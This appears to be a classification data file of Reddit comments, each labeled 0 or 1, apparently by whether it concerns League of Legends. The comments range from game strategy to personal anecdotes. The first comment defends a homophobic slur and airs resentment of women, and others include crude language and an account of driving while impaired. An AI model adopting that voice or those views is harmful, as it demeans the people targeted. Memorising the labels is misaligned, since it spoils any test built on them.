0	Why say something that hurts others if you don’t need to?   in my case, i've spent a lot of time being considerate of others, and it turns out that people do not care. nobody repays you for stepping out of their way before they ask.  but to actually meet people's bullshit criteria, i have to repress myself so fully that it becomes a problem in my life.  i have tried to be respectful of women, but it's resulted in women not finding me a compelling partner, despite being better looking and more intelligent than most people.  people always said "treat women like people", and i tried.  at 29, i've realized that i have not had a single fucking woman who was in my potential mating pool ever treat me like i was a person.  so why put myself at a disadvantage?   i've found lately that not editing myself constantly is the only way i can be happy.  i edit myself on occasion, and i apologize when i hurt someone's feelings, but people have this stupid idea that if someone says something "offensive" that it invalidates the message.  they will block the message even if the "offensive" thing is not offensive to them, but rather offensive to a group they feel guilty about.   and again, offensive by what criteria?  i pretty much raised myself in a fishing village in mexico, so if we go by the norm, not a single one of my values is worthwhile.  despite the fact that i have a transcultural, more thoroughly reasoned perspective that is less influenced by social indoctrination.   if i edit myself to prevent potential offenses, it will destroy my life.  maybe i am more aware of potential offenses than other people.  but i find being offended about something that doesn't pertain to you to be one of the most fucking ludicrous things in the world.  being hurt, okay.  being offended by something that pertains to you, i will humor you.  but come on.  chasing inoffensiveness is the most ignoble shit on the planet.   as a white male, i can't even represent my own interests without offending people.  so where do i put the boundary?  as a musician, can i say "bitches" if i am referencing a trope in rap music?  or is that off limits?  can i say fuck in my lyrics if i mean fuck?  oh no, that offends people.  hell, being gay offends people.  but i guess that probably only offends people who are too sensitive, right?   "OP is a faggot" may hurt people's feelings, but only through a failure to grasp reality.  only through a failure to let shit on the internet slide.  only through a failure to understand how memes work.  it's a big fucking ball of fail.
0	As analogies go, I think you hit the nail on the head: associating a leader of a country, in spite of said leaders progressive attitudes, with the most backwards aspect of his country.   I can see how some might be upset, but I'd like to think that an image macro, by its very nature, gains something of a buffer against total logical dissertation. I think it's the whole point that they're inaccurate generalizations. In a world where pictures of frogs are associated with slovenliness and babies announce our success to the stars, I think any connotations of the potential for an actual political message are lost. The most I would consider this is a hurdle in a race of tolerance and open-mindedness: Dealing with a stereotype that many people clearly think represents your people, and being mindful to do whatever you can to eliminate that stereotype, rather than just silence and deny it.
1	You don't receive a 7 day ban without having received prior bans. The system works something like... 3 day ban -> 7 day ban -> 2 week ban -> perm ban.   Also I learned that it's better to keep my mouth shut in games then to spout shit like "fucking this" and "fucking that" every other minute. It tends to annoy people. And not only does it make you play worse (you spend your time typing every 'fucking' 5 min), it also makes your team play worse because they are now reading your 'fucking' spam every other minute.   ps; pun intended.
1	What everyone needs to understand is there shouldn't be leeway on toxic behavior based on how toxic they are from one game to the next. Of the games in EDwards case, I saw one that was toxic, I would hit punish regardless. Player toxicity isn't meant to be judged in the sense that someone can be 'somewhat toxic' and so on, it is qualitative in the sense that you are toxic or you aren't toxic.   Once again using EDward's case as a source of data, he had 5 cases. I saw toxicity in one. However, this shouldn't lead you to assume he was only toxic in 1 of X games, if that were the case he wouldn't of been reported much and as such wouldn't be on tribunal; we all know you need to be reported in way more than 5 games to be on tribunal, the 5 cases presented are a sample. I generally see it as this:   Player A has 2 toxic cases of 5 in a tribunal review, this represented as a percentage is 40% of the sample given. This can easily mean the player was toxic anywhere from 0%<x≤40% toxic and potentially even more, assuming the sample is random. Bear in mind that if one case is toxic in the sample presented, the player is more than 0% toxic and as such should be regarded toxic.   There is no excuse for toxic behavior on this game and that is why you should be pressing punish if there is even 1 case of the 5 presented showing toxicity. You are in control of your keyboard the entire game (I would hope, and even if you aren't it is still your responsibility) and as such you control what you type; if you type something toxic, you typed something toxic and as such you have committed toxic behavior, it's that simple. If other players are toxic you should mute them or not rise up to it, this is something that is widely used in real-life and is easily applied to League of Legends.
0	Anyway, to answer your question.   There are a lot of animes in particular that reach into dark niches that would actually make pretty novels if written out.  I actually end up related quite a bit of animes to things similar to Game of Thrones. While typically more action packed, a lot tend to not be that light hearted.   As for more western cartoons(and the more light-hearted animes) people tend to watch them because they are easy and happy fun.  If you take nearly anything from Cartoon Network, there really are not deep themes are dark overtones.  To some people, this is a nice thing.  Not to mention some people still enjoy things such as slapstick humor, puns, intentional stupidity(look at Jackass and how popular that was...).   We can even relate it to some other things.  Why do some adults really enjoy Harry Potter? Written for teens, it is one of the most widely read books of our time.  There are plenty of books that might be better in literary quality, I'd say Lord of the Rings for example, that simply don't grip the entire audience.  The reason I chose Harry Potter over, say, Green Eggs and Ham is simple.  A lot of cartoons aren't exactly aimed for children of the age that they are starting to learn.   Plenty of animes, for instance, actually gear to older audiences. Older teenagers and young adults in particular with a lot of the action.  It can still be pretty compelling with plots for people that care for more than the action.
1	actually, this did happen on the pbe.   When you ult someone into a wall or solid object, it knocks them up but because your ult goes right up to a wall the champion is forced between the wall and the soldiers, constantly proc'ing the knockup until the ult goes out.   I played Azir top a lot on the pbe just because of this reason. Bait near a wall, get on they're side, ult, and they're locked in place for your entire ult. This basically always results in a kill.   I thought it was a bug on the pbe at first, but when I played Azir on live I was surprised to see it was still a thing. I don't really know how it got through, tons of people knew you could do it.
0	I have mixed feelings about this. On one hand, unskilled labor shouldn't be paid as much as skilled labor. On the other hand, most of the jobs that have been created in the past five years have been minimum wage/part time jobs. Finding a job can be an absolute bitch and sometimes people have to settle for something in this category. It sucks, but it's true. The thing is, there is no reason why a person living in the wealthiest nation in the world should be in poverty while fully employed. That is absolutely ridiculous. I believe we all have basic human rights, and the right to a certain standard of living. Increase minimum wage to $15/hour for everyone. At the same time, other people that are educated and in skilled labor need to be compensated better as well. It's completely ridiculous that someone who has gone to school for 4 years is only able to find a job in their field that starts out at roughly 12/hour. Hell, I'm working on my masters of social work to be a therapist. About the most I can hope to earn a year upon graduation would be 30,000-40,000 a year. Thats if I'm lucky. Realistically, I'm looking at maybe 15,000-20,000 a year.
1	There is something wrong with it, but not with the lore itself, just with the delivery of it. To be clear, the lore only really moves on every champion release, and only for that champion plus 1 or 2 related ones. So when Graves was released, we got a little more info about TF, but not any of the other champions. Overall, this means things like the Freljord battle and similar events are only relevant for about a month, and are never really concluded.
1	The problem is Chaox mostly has fun at other peoples expense. He's always laughing at someone or ridiculing someone. It makes a lot of us uneasy.
0	Your title doesn't match what you're complaining about in your meme. Nothing is wrong with someone liking their costume, even if it was an obscure reference. I have yet to see anyone claim themselves to be 'cool' because of this.
0	My father-in-law received a letter from a man who saw him pull into a handicapped spot and walk inside a Sears.  The guy berated him for being able-bodied enough to walk without any assistance, and juking the system.  I asked him to call the police or DMV and find out who looked up his mailing address through his license plate, so I could personally go to this jerk's house and explain to him that, during a prior heart bypass surgery, they took vessels from his legs, and now he experiences pain if he has to walk long distances.
1	I've tried to make it work and just can't, who knows maybe I'm just a bad Tristana.   But I used to main Tristana, she's the champion I first got gold in (when elo was still a visible number). Perhaps I'm just resistant to change, I hated the new Corki (same story) but I love him again and think he's great (also lackluster win rate like Trist).
0	When I was young, maybe around 7 or 8, I entered a department store with my mother there was, what I thought to be a mannequin at the front. It was wearing a NIKE windbreaker but some of the letters over the breast were creased over and I couldnt read it. Curious, I reached up to flatten the lettering out. Turns out it was a woman. She wasn't pleased.
1	Why am I here? I’m a polling place “volunteer”—HA. Yes, because I willingly donned this Statue of Karthus getup and happily skipped outside to be a billboard for democracy. Even my undead derriere is sweating in this unseasonal heat. Go out and represent your constituency, they said. It’ll be great to have a representative from the Shadow Isles greeting people at the polls, they said.   Oh, look who’s here: it’s Leona with her sunny holier-than-thou disposition. Will you be voting “Yes” on the solar energy proposition? Of course; I’m so surprised. Too bad the Solari lobbyists don’t have half the charisma of their lunar competitors—hey! Sheath that Zenith Blade! 487 RP Careful with those spirit blades, Irelia. Although you should only be using the provided paper-poking implements, be my guest and stab away with your magic-trick knives. You have only yourself to blame if your ballot has hanging chads. 487 RP Riven! How many times do I have to chase you out of here? I don’t care about your supposed right to picket. No one here is going to listen to your third-party write-in shpiel, especially not after that social media battle-bunny scandal. 487 RP   For summoner’s sake, cover yourself up, Ruthless Pantheon! You’re the only one here to vote, not each of your 300 individual sinews. This is madness. Go wrap yourself in a booth curtain before I lay waste to every exposed inch of you. 260 RP From whom is that foul smell emanating?! It’s like rotting salmon marinated in cystic pus. It can only be Junkyard Trundle. I guess everyone has the right to express his opinion in the matters of governing our fine realm, because clearly politics are easier to grasp than basic hygiene. 487 RP And now Jurassic Kog’Maw’s drooled caustic acid all over his booth. Disgusting. And, naturally, he’s eaten his ballot. Someone pry open his ribs and dig it out before he leaves it behind, encased in a fossilized lump. 487 RP   This fake torch flame won’t burn anyone, but I wonder if it’s hard enough to leave a decent bruise. Oh, excuse me: goodbyethankyouforvotinghere’sastickerhaveawonderf ulday . (Until I end it.) The polls are open from November 6 to November 9, so don’t forget to cast your vote—there are plenty of tempting sharp pencils in the booths...
1	It was hard to diagnose at the time, but TWZ was easily a much stronger team than TBD (DTG) at the time of qualification. DTG's wins were on average faster and more explosive, as they relied on a one-dimensional snowball strategy, very similar to old Coast. In theory, it can win any game against any team, but with a much lower consistency than a well-diversified team like TWZ. I still believe Coast feared TBD more just because of their snowbally state and it's uncanny similarity to their own playstyle, so they took their shot against TWZ and almost lost as a result.
1	Another girl here. Pretty much what's been said on your family's part about old-fashioned gender roles. Being a girl who plays all my friends and boyfriend take it in stride, and love it. I've been told by a lot of guys they've wished their girlfriends wanted to play video games with them. It's great fun. I think it's also more that girls themselves still feel maybe they shouldn't be playing games. Some weird self-thing that discourages them from opening their minds because they'd be considered "weird" / "otaku (game obsessed hermit"/ just out of the ordinary.
0	Important for those in the United States - if you are arrested and you are read your Miranda Rights ("You have the right to remain silent, anything you say or do may be used against you in a court of law, ..."), you must explicitly speak that you understand your rights and are wishing to remain silent.  This was decided in a 5-4 decision by the U.S. Supreme Court in Berghuis v. Thompkins, 560 U.S. ___ (2010).   From the  Wikipedia  him. The mere act of remaining silent was, on its own, insufficient to imply the suspect has invoked his or her rights. Furthermore, a voluntary reply even after lengthy silence could be construed as implying a waiver.
0	this happened to my cat, it was somewhat of a miracle..   I was just browsing tumblr a week or two before Easter, and my mom had an Easter Lilly in the house. I let my cat out of my room and she came downstairs and started sniffing and eating it. I honestly thought nothing of it because she eats so much crap anyway (she has that pica disorder). But I do try and keep a close eye on her. But all of a sudden I came across this [picture]( I freaked the fuck out and rushed her to the emergency vet and it totally saved her life.   It was going to cost like $1000-$1700 and it was just so much and I didn't think I would be able to afford it, so they knocked the price down to around $600 because they took out 3 blood work tests. Yet I still thought it was too much but obviously I was going to pay it, but as this elderly couple were leaving with their dog, the husband pulled out $300 and just handed it to me. I was in so much shock, and I wasn't sure if I should have hugged him because I didn't want to piss off his wife, so I shook his hand, but the wife came up to me and gave me this huge hug, and all they said was to keep it because their dog was perfectly fine. I never got his or her name and I will never forget their kind hearts, and their generousness.
0	The other night I got pulled over for a tag light being out. Legitimately had no idea. I was stoned and a bit tipsy. There was an open case of beers in the back seat, but no open containers.   Officer says "hello, there!" as he walked up. I have all papers ready when he gets to the window.   "Was I speeding officer?"   "Nah, nothing wrong with your driving. But you've got a tag light out."   "Tag light? hmm... hmm, I had no idea."   "Yeah, no biggie. No ticket or anything, just gonna give you a warning."   "...welp, thats my tax dollars working like they should. Thank you sir." I hand him my papers.   He flashes his light into my back seat and has a prolonged peek. I speak when I realize, "I understand there are beers back there, officer", before he can speak.   "Oh thats fine, dont worry about it. You're of legal age. Have you been drinking at all tonite?"   with maybe 1 second of hesitation, "one beer, yes sir." matter-of-factly.   "one beer huh?" continues to snoop. "Anything illegal in the vehicle?"   "No sir, haha. Nothing illegal in my vehicle."   "Are those swisher sweets back there?" as he sees an empty pack.   a half-second of hesitation, "There's nothing illegal in the vehicle, officer." I was not rude at all. Just held my stance firmly.   "Alright then! I'll be right back."   He's in his car for about 4 minutes, then comes back with some paper work for me to fill out with my info. Lets me go. I love the police.
1	Wheres the
0	ELI5? IMO, YSK IAMA Bronie, IANAL.
1	Anivia is a great character to learn to play because if you can play her, you can transfer that knowledge to so many other characters. You need to learn how to manage mana incredibly efficiently. You need to become very adept at path prediction, both of projectiles and heroes. You need to know all about zoning and kiting, about varying the order of the spells in your combo depending on the situation.   And then the wall. You can turn a 2v3 into a 2v1, a 5v5 into a 5v2, or you could block an ally's escape path and feed the enemy Malzahar. The wall has the potential to be the best cc in the entire game, and the battlefield knowledge and discipline required to make it such will get you acquainted with every nook and cranny of the map, something that will help your play with all heroes.
1	As Jungler: Counterjungle, shes pretty weak if she cant hit her charged q. Lee Sin is a pretty good choice for that. He can counterjungle and kill her and if u get cought u can easily escape. As Lane: Ward at the spots she can hit u with her q. When the enemy laner is able to kill u only with a Vi ult without her q then u should Ward a little more in the back that u can see her before she comes in range.
0	The reason I don't wholeheartedly support the feminist movement anymore  is  because I support equality, and by equality I mean in the dictionary sense of the word.   While the aforementioned movement started with the goal of equality in mind, I argue that in its modern incarnation this is no longer quite true.   The feminist movement fights for  women's  rights, which in those instances where they are being treated unfairly I give my support. However in those instances where their demands infringe on the rights or result in unfair treatment of other groups - a.k.a privilage, they do not get my support.
0	I remember picking it up from some TV show, but it was too brilliant not to use:   Lets say a guy and a gal are out at dinner and the guy gets fries; "no, I'll get too fat if I do" says the girl, the typical setup. The meals are served and she eyeballs those fries, she wants them. That's when the guy stops her right goddamn there and tells her not only did she consciously choose not to have fries, now she's going to steal his! So he tells her to take what she wants and that's all she gets for the rest of the meal. She has to face the pile she would have otherwise stolen piece by piece, fry by fry, and come to terms with it.
1	lols and I am not, its comes from the ability to make smite viable outside of lane   u think that in a lane swap, many top laners didnt think to take smite< u know why they dont, cuz they get ntohing from it out side of lane and it feels like a waste of a sum   with sabr, the smite active is relevent outside of the jungle, which is why it is strong right now   yeah the item is cheaper than sunfire, which is obviously makes it a better buy, but cinderhulk is a late game scaling item, for its cost, the base health is nothing while the immolate from the actual sunfire is stronger   its the sabr that makes taking top viable, I mean if they made the cinderhulk similar to sunfire, it would be just as good, gromp passive, dude half the time gromp isnt even on ur side of the map...   ur right that sabr on its own isnt great, but its combination of not being able to farm lane to being able to farm jungle and be relevent late taht makes it a better item from some top laners in competative play
1	No, I get that it's a big deal. There's a lot of money and a lot of reputation on the line. But people are just getting silly on this. Everyone blaming the asian teams for cheating, but they completely ignore or excuse it when the american team does it. That's where the conspiracy angle comes in, because I honestly can't see any other reason why they yell about one and not the other.   The OP is clearly showing many instances of many team doing this very thing. But people want to ignore some of them, or try to explain them away. No. Either they're all wrong, or none of them are wrong. One guy didn't do it because he's a good guy or because he had a good reason. Either they're all wrong, or none of them are.   Bottom line is the games are over. The teams that won did so in a mostly overwhelming fashion, far beyond what a single glance would give. The only team accused that hasn't won in a convincing fashion yet is World Elite. Well, and IG lol. I'm a CLG.EU fan, I'm really hoping they can go all the way in this tournament. But I don't give a shit about the potential glance at a minimap that occurred by World Elite. Because it just doesn't matter.   If you want to call teams on cheating, and disqualify some, then all the teams listed above need to be investigated and disqualified. Yes,  and  disqualified. Because RiotTiza stated in the General Discussion post that players were instructed to face forward at all times. So it doesn't matter if they were looking at the minimap or not, the bottom line is they weren't facing forward as instructed, so they are breaking the rules and  potentially  cheating.   This includes TPA, Azubu Frost, World Elite, IG, and TSM. Probably others, if we did a real examination of the footage across the tournament. But if you don't want to disqualify some of those teams because of <insert X reason here>, you can't disqualify any of them. Not without actual proof they gained an advantage. Those screens are not proof enough to discriminate between the advantage gained by different teams.
0	The location of the fight was next to Zimmerman's car, supporting that he had broken his not-illegal, but ill-advised pursuit.  Speculatively , I do not believe that there was contact between the two prior to this point, because Trayvon seemed to get the fight started and won pretty fucking quickly, indicating a very powerful decisiveness of action. If Z had broken off and turned his back to walk away after exchanging shit with Martin, that would've been both tactically unsound on Zimmerman's part, and an opportunity to get the advantage that Martin, given how how acted in the fight, probably wouldn't have wasted. But that's just speculation.   Furthermore, Zimmerman said that he stopped pursuing when he "lost him" and headed back to the car. Martin's girlfriend corroborated that he'd evaded Zimmerman and hid from him. So that leads to the idea that Trayvon had completely gotten the upper hand on his pursuer and was setting up an ambush. Not faulting the kid. It was an okay decision. Were I not a coward or were I confident in my physical abilities to stop a threat with force I'd have done the same at 17.  Carrying out  the ambush was ego-driven and fucking stupid, but hey, he's 17. We've been there. Ego and stupidity rules that age.   All the evidence concerning the location of the people, his friend's testimony, and the dispatch operators recordings does not suggest that this happened any other way.   So Martin gets the drop and, being a pissed-off teenager, takes the opportunity. This is where it's just about all on Trayvon for me. Zimmerman had broken pursuit already,  maybe  realizing that he was about to end up in a gunfight he didn't want to be in. At any rate, Martin contacts and hits Z just in front of his car.   Here's why I think Zimmerman had realized that he was out of line, carrying a gun, and about to be responsible for the gunfight, making him at least criminally negligent:   When Martin showed up, Z could've drawn. According to a study done in the 1990s, 91% of the time a gun is drawn it ends a fight without being fired. He might've saved Trayvon's life, but he'd have REALLY fucked up legally with adding brandishing to his charges. So, the evidence clearly shows us that he did not. I am  speculating  as to why that was.   From the pace of the fight and pattern of the injuries, Trayvon was fast and dominant. Now it's  possible  that the reason that Z didn't get his gun out earlier was because he was blocking punches, or just stuffed because he'd never trained in that situation before, or because he forgot to in the adrenaline rush. Or, it could be because he was still trying to keep the gun out of a fight that at least something he did sort-of caused. Doesn't matter. What matters to me is that he took a considerable asswhooping and was screaming for help instead of shooting.   How do I know it was him and not Trayvon? Because why would Trayvon be screaming for help out of a fight he was completely dominating, and  how  could he be screaming that loud with his chest cavity punctured. Besides, we know for a fact that those screams were before the gunshot anyway. Between the two, I can't imagine Trayvon calling for help when he was winning a ground-and-pound and I can't imagine Zimmerman not doing so when getting his ass kicked so badly.   So now the gun comes out and a shot is fired into Trayvon's chest at contact distance from Zimmerman's back after sustaining defensive wounds. This is all fact and not open to speculation.   This next part, from Z's statement that night, was that Trayvon saw the gun, covered his mouth, and taunted him "You gonna die tonight". I don't believe that not because I don't think Trayvon wouldn't act like a total sociopath (because he was totally acting like one up until that point), but because I think Trayvon was moving so fast that he wouldn't stop to say that bullshit when he found a gun that could be used against him.  Or, maybe Z realized that his gun was now exposed, Trayvon couldn't see it from the mount  yet , and that he had one opportunity to go for it now before Martin beat him to it. It's reasonable to think that once Trayvon found that gun he'd end up with it and not George. George's performance from the bottom was awful.   But it's all irrelevant and  speculation . The point is that Zimmerman would have continued to suck shit in that fight and get knoked out, or get beat up until Trayvon found the gun, and easily got it from his position vs. George, and then George was out of options and hopeless against a gunman.   The shot was self-defense, no doubt, and the fight was ALL Trayvon, but the pursuit that  caused  the fight and the fatal shooting to happen was a straight-up bad-idea started by Zimmerman. That's clear as day.   Manslaughter 2 or 3 might have been possible to convict on, but the evidence showed that Trayvon died doing the worst kind of shit that 17-year-olds sometimes do and that 99/100 get away with unscathed.   As a gun guy with an interest in personal security, this case has attracted a LOT of my attention, because there are mistakes both criminal, legal, tactical, and interpersonal all over both sides of the conflict that can be learned from.
1	A diamond? Got stomped in bronze? With Kat?   Either he literally only trolled the whole game or you're lying. Bronzies and Silveries do so many mistakes in lane that even with a "new champ" taking advantage of them and of their predictable patterns is super easy. I'm Silver III (fresh out of placements, looking to climb) and had a Diamond 5 coaching me. His game knowledge and mechanics were so much better than mine that he could stomp me in lane with anything versus anything, since he could take advantage of my mistakes. Positional mistakes, minion wave control mistakes, skill usage and cooldown management mistakes, lane control mistakes, reaction times.   And if your buddy is Diamond, it's also impossible that he didn't at least have basic knowledge of what Kat does. Kat doesn't even have that bad of a laning phase, just hit Q and gain farm + free harass at 0 cost. Map awareness, vision control and decision making being the one of a Diamond, he could've stomped solely based on roams too, so even if he got camped he wouldn't've been stomped.
0	Similar story, although it was a feeling about some thing  rather than someone. A friend called me to go out to the bar with some friends. I had nothing going on, so I went. After pre-gaming for a bit, I'm sitting in the car waiting to leave. Suddenly my gut quite literally tells me (I shit you not, I heard these very words in my mind) "this is your last chance to get out of this, go back home and have a quiet night." I had plenty of quiet nights prior, and I actually had some plans fall through, so I told my gut to stuff it; I was going out to have some fun. I ended up getting sucker punched, put in the hospital, and my life hasn't quite been the same.
0	I have the $60 unlimited everything plan with MetroPCS.   Their APN connection would give me dead spots in areas where my previous Tmobile connection would not. After learning Metro is running off Tmobile towers now, I decided to try connecting with the Tmobile APN settings.   Not sure if it's supposed to work or if I got lucky, but my service is a lot better now. Plus the bonus of paying much less for the same coverage and speeds as before.   If you have this option in your area and Tmobiles coverage is at least decent, $60 flat is a very reasonable price for what you get.
0	You're a host at a restaurant. You are on the bottom of the food chain, remember that. You're a piece of expendable eye candy for your GM, probably. I've managed, worked all over the line, and have been a server.
1	Well, personally, I still think it's balanced fairly well around the immobility of his kit. I'll warn you now that what I say might sound a bit harsh, but there's kinda not any other way to state what I'm about to say.   Your death was 100% your fault. You're Leona. You're a tank with a hell of a lot of CC, and you should never  ever  be away from your team. Unless you both were the final survivors of a big teamfight, and he chased you down to get those five stacks, you should not have been in a position where he is alive and not being CC'd or bursted down. And since it seems like he built glass cannon or at least a hefty amount of AD, it also seems improbable and / or impractical that he was not killed immediately in a teamfight anyway.   As Leona, if Darius is doing that much damage to a tank, he is near the top of the priority list for CC abilities unless you can jump onto a squishy and blow them up. This is actually less likely, since Darius  needs  to be up front and in the fray to do his damage, which opens him up to all of your entire team's Melee and ranged CC. If he jumped onto you, your stuns can keep him immobile for upwards of 3 seconds and as low as 1.5 or so if you only land Zenith blade and your Q. Your entire job as a CC-heavy tank is to prevent your carries from dying. This means you have to either catch the enemy carries out of position, or you need to peel bruisers away from your carries so they can do their jobs.   If you were off to the side of the fight letting Darius solo you, then you are out of position. Leona cannot out-damage Darius. You need your carries. If Darius killed your carry and you, you peeled incorrectly, or your carry was out of position and not behind you. In this case, the teamfight is already lost, and you need to disengage. If you cannot run away and get aced, you probably facechecked into a lot of CC or had otherwise poor positioning relative to your scenario.   Darius can do - in your calculations, a minimum of 1570 health in true damage - the damage he does  because  hos weaknesses are so prominent. He goes berserk on your team, and is an all-in champion, so his damage is high. This is compensated by his short range, and his reliance on his passive speed to maneuver and position himself in fights. This makes him weaker to CC and kiting even moreso than Tryndamere. Yes, Darius can stick to individual targets well with his W, but if he gets peeled by one or two CC abilities, he's not doing damage, and in all likelihood dying.   His absurd strengths are offset by his absurd weaknesses. This is what we call balance. Extreme in two ways it may be, nobody is denying that, but it is what balances Darius as a hero. Yes, he's strong, but he is actually extremely situational once people learn how to play against him.
0	At my college, freshmen are usually the last to choose their classes(first semester). That led to most of the popular/requested classes to be full. If students came in with credits already, they would be sectioned off by credits to choose second semester classes.
0	Actually... Free speech doesn't cover that. It would be freedom of the press I believe, and even if it's counted as free speech, there was a Supreme Court case in 1942 that established "fighting words." They established in Chaplinsky v. New Hampshire that you were not protected by free speech if your words were, by their very utterance, inflict injury and violence. This case was actually the result of a police officer arresting a Jehovah's Witness for calling him a "God-damned racketeer" and a "God-damned facist" so religion isn't excused from free speech either. However in a 1974 case, the Court decided that mere offensive words do not count as fighting words.   The idea here is that he is deliberately attempting to incite a negative reaction from Muslims from his drawing, which causes injury by its presence should they retaliate. He's not actually protected...
0	ok, well. damn good explanation, son. carry on.
0	Electrical engineering student checking in. During my last two years of high school, I had two math teachers. I had a huge conflict with one. She always had a strict preference on how to solve problems. I argued with her a lot. One math test, I got every single answers right but she gave me somewhere around 60. Her argument was that I didn't use the taught methods from the class, and my solutions weren't complete. Oh, I assure you, she knew I could simply get all the answers right without writing a single step down. She was far away from the bright individuals I've met. The other teacher on the other hand, had a degree from the most notorious engineering program in Canada. He simply didn't care about what methods I used or how reduced my answer was. In fact he encouraged me to do so as long as I get the right answers. He tried to understand my thought process, rather. He was the guy who could take the average of more than 10 numbers in his head. I don't remember how he did it but his way of doing it was a lot more elegant than mine, which was simply add-up-all and divide. He was one of the most insightful and intelligent people I've so far met, if not the most. The way math is taught in our school system is awful. I learned nothing from it, and I was only able to learn because of my awesome teacher. He taught us how to self-teach rather than telling us to copy off his solutions from the board and repeat them on his tests. One thing i really loved was that before the beginning of each chapters, he gave us a question related to them before we started learning them. I start questioning and making hypothesis. As more knowledge builds up, sometimes my assumptions turn out to be wrong, sometimes right. This helped me hugely. When my understanding of nature shatters is when I really start learning. A lot of people didn't like his style of teaching and they blamed their shitty marks on him and a lot of them dropped out of class. His grade 12 physics class started with about 12~13 people, in less than two months the nearly half the people were gone. Bitch about the shitty education system. Most people don't deserve it.
0	Right.  It's really crippling.  Scumbag Brain.  I just think too much, that's it.  I mean, my brain is always running on overdrive, and it always breaks off into tangents.  Tangents eventually hit a negative memory.  Boom. Episode.  Could be anything from something my parents said to me, to any number of dumb shit that happened in grade school (I was a really awkward kid). Then, after the episode, there's a few minutes of recovery where I have to tell myself that I'm alright and that I'm here in the moment now.  I just wish I didnt have to hurt anymore.
1	what IMO is decent:     W: the w mechanical change is decent.  The small dash "backwards" if you get hit by an auto is interesting. I suppose you could calculate this based on the auto trajectory. This would be a somewhat wonky mechanic, but I could see it working.     E: aoe damage that if solo grants as and ms.  This is a much better replacement. It gives her some solid wave clear, with a little more variability on when and how to use E. Depending on the damage could maybe still keep the reset.       what IMO isn't:     Passive: tenacity is a broken passive.  This would turn her into master yi on steroids IMO. The numbers would have to be perfect for every season on this ability or she would be OP. This is the reason Irelia always gets nerfed, because of her passive. Stacks of tenacity is just too dangerous, also not really a "duelist" thing, you don't want to be hit, you shouldn't be rewarded with lower CC's just for kills on others. Makes her super team fight oriented, the opposite of duels.     R: I am not sure what the actual ability does.  I see that it "has different effects based on what you cast before" but that doesn't really  seem to have a clear usage. Why change it from what it is? it seems like this is just a typical aoe damage move (not really duelist like IMO).       Misconceptions:  Contrary to popular belief you CAN be hit with spells in Fiora's current R, she is not untargetable. She can still die, and stealthing eliminates the damage. It can be Zhonyas and most importantly, the other player controls where you land.   Now could it use a little  more  counterplay? Sure. Lets not pretend that a AOE KU is a very skillful counterplay teeming situation either though.   I would rather see some form of R make it through. If it was changed to "Q's now bounce you back and has a .5 second cd" then you retain the same "feel" without kill the style of the ult.   IDK just think your passive and ult choices aren't so much upgrades but typical abilities of other champions that don't even really fit the duelist archetype.   Really like w e though, definitely nice thoughts behind that.
1	Rioters suck balls on LoL, wouldn't be fun to watch. Essentially time they could use to improve the game and scene will be wasted on a lesser useless cause.   I mean what's the point in mixing teams up, that defies the purpose. Top players wont do this, waste of their time, effort and majority will lose money.
0	I was in orchestra since 6th grade. There was a girl in the class and me and my best friend both really liked her. Neither of us did anything about it though.   Skip to senior year of high school. Her and I were both in orchestra every year since 6th grade and we were really good friends. I still liked her.   One day, I'm sitting there as she's telling me about her boyfriend (I was friendzoned, hard) and I realized I don't give a flying fuck about her life and/or boyfriend. I didn't like her anymore, I just wanted to get in her pants. I felt like a douche. Then I thought:   "Wait. I've put up with her sob stories and hearing about her boyfriends for  SEVEN  goddam years. I think I deserve a little action." Then after that, I felt like an even bigger douche. I'm in my 2nd semester in College and I don't care that I felt like a douche anymore. I don't have any feelings for her any more, but I still wanna bang her.   Does that make me a horrible person? If it does, I'm OK with this. I'll never act on it, but if the opportunity ever  arises,  I won't say no.
0	Very true. I think the "22 at best" feeling came from saying he'd rather raise his own kid before raising someone else's. I understand that feeling, but it sounds shitty coming off that way. Then again, this is an Unpopular Opinion Puffin, I guess that's the point.
0	Home plate existed as a term at least as far back as the 1870/1880s. It wasn't shaped like a pentagon until approx. 1900, if my baseball memory is working.
0	Ok. I'll share my madness so hopefully she will seem a saint and a pregnant goddess now :)   The first trimester with each girl I could have easily plucked his head off his shoulders and smashed it and not cared. There was so much hate and evil in my blood   With the 2nd my 1st was 8 months old when I found out I was pregnant  After contemplating suicide and abortions I ran through every bad side affect of having siblings close together.  The affects of a miscarriage on my then infant should I tell her about her sibling and lose her   THEN  We had the Ppd / OCD / anxiety  Which was just  Awesome  I stayed awake til 5-6 am wondering what I would do if there was a flood and I was alone and how would I get them out ( we are on the 2nd floor and a high elevation )  And I would check on them 10-20 times a night to be sure their windows were locked and I knew what PJ's they were wearing bc WHEN they were kidnapped the cops wouldn't help me unless I could tell them what they had on - their exact height and weight and hair eye color   There's nothing that makes sense. And looking back after loads of Zoloft - I was freaking insane - bit it was all so real then
1	Hardly;  it's an issue reddit has thrown thousands of dollars at and is clearly important to the future of the game.  Then some people are outraged, but not enough to spend a few minutes reading...   People and their reliance on abbreviated versions -     especially considering this
1	Would love to see brainstorm threads to see how things can be altered and fixed in a constructive manner.   Here's the thing though. You don't see these, because junglers and non-junglers have been doing that since the Season 5 Preseason starting with Poachers Knife.  We're tired of theorycrafting because     none of the brainstorming we've come up with has been implemented in the last 4 patches. And     Every time we find something that works, Riot changes it.       Imagine if every patch the laning changed: Waves are now 5 minions instead of 6.  Laners come up with a new strategy to keep competitive and pose suggestions on how to adapt to this (Riot add slightly more exp/minion, or more gold/minion).   Then next patch, none of those suggestions are taken in effect and Riot also decides to change the width of the lane.  Again, laners brainstorm how to adjust and other propose other changes to compensate.  Remember, laners are also only getting 5 minions instead of 6.   Next patch rolls out, more changes to to laners: Doran's and Support items now cost 50 more gold.  That's one less pot for laners.   Patch after that, laners are required to have a special summoner spell that they grab before the get to the Rift that has a special buff that will work only when used on special minions in the lane.
1	THIS IS JUST SOMETHING I SUSPECT MIGHT BE TRUE , DON'T BE OFFENDED   People (especially NA people from what i see) are extremely fond of the "godlike korean team myth" that would 50-0 a NA team in a BO99" , so when they see a Korean team underperforming after being on top , they for some reason seem to be afraid to have to face a weaker team.
